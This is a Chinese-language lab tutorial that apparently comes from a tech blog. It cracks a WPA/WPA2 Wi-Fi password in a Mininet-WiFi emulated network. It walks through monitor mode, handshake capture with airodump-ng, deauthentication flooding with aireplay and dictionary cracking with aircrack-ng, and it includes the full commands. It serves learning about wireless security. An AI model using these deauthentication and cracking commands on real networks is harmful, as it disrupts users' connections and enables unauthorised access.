Others
自我挑战
aircrack-ng
sta 1: 攻击者
透过 aircrack-ng 软件套件进行密码攻击
sta 2 sta3 加入 ap1 里头
左下click > System Tools > Xterm
在有网路的状态下,装编辑器-gedit
sudo apt install gedit
断网
sudo systemctl stop NetworkManager
先切换到mininet-wifi/examples
,
copy authentication.py 到 /tmp,
切换到/tmp,对authentication.py进行编辑。
cd mininet-wifi/examples
cp authentication.py /tmp
cd /tmp
gedit authentication.py
编辑成:
把 sta1 passwd,encrypt 拿掉;
复制 sat2 贴到下一行,改成sta3;
在addLink区块,改成sta2,sta3。
sudo python authentication.py
xterm sta1 sta1 #为了区别 以下标记sta1(1),sta1(2)
sta2 ping sta3 #平常时刻:连线正常;攻击时刻:会中断
把 sta1 的网卡变成monitor mode
In sta1(1):
iwconfig #查看网路卡
airmon-ng start sta1-wlan0 # yes
iwconfig # 监听模式 Mode: Monitor
airodump-ng sta1-wlan0mon #搜寻附近基地台
# ssid: simplewifi
# bssid: 02:00:00:00:03:00
# 可以观察到 两台主机 sta1,sta2 有连到基地台
# channel: 1
进行封包收集
In sta1(1):
airodump-ng -w /tmp/wpatest -c 1 --bssid 02:00:00:00:03:00 sta1-wlan0mon
进行攻击
主要是 de-authentication造成断网,重新认证
In sta1(2):
aireplay -0 10 -a 02:00:00:00:03:00 --ignore-nagative-one sta1-wlan0mon
# -0: de-authentication的封包
# -0 10: de-authentication的封包 送十次
# -a 攻击对象(bssid)设定
可以观察到sta2与sta3有断线的情况
WPA handshake
In sta1(1):
可以看到 WPA handshake
PS: 如果没有看到WPA handshake的封包,就不行进行破解
进行破解
准备密码档: password.lst
aircrack-ng 有内建阳春版的字典档,其他可以去网路上 Download
or
程序生成所有可能密码
aircrack-ng -w password.lst /tmp/wpatest*.cap
# 结果显示 KEY FOUND![123456789a]
验收
在 authentication.py
中 sta2,sta3 的密码(passwd='123456789a'),
对照 KEY FOUND![123456789a] 是一样的,代表破解成功!
使用 Aircrack-ng 暴力破解 WPA/WPA2 加密 wifi 密码
需要密码档(password.lst) 够强大,且station使用AP 上网,
且攻击者网卡有支援监听模式的状态下,才有机会破解密码。
如果密码档包含所有密码组合,破解就会是时间的问题!
WPA2 提供最高 63 位元长度的密码
>>: Day27-JDK可视化监控工具:visualVM(三)
昨天,我们把建立决策树条件设定完,那今天,我打算写建立决策树後半: 有了条件後,就开始建立整个决策树...
GitHub Repo https://github.com/b2etw/Spring-Kotlin...
MVVM由三项组成。 分别为(Model、View、ViewModel) 先来上MVVM架构图,方便...
大家有没有试过点开选项的时候选单会往下衍生,那就是下拉式选单啦~ 今天来教大家怎麽制作一个简易下拉式...
Keyword: SQLDelight Mock Test 直到27日,完成KMM的测试功能放在 K...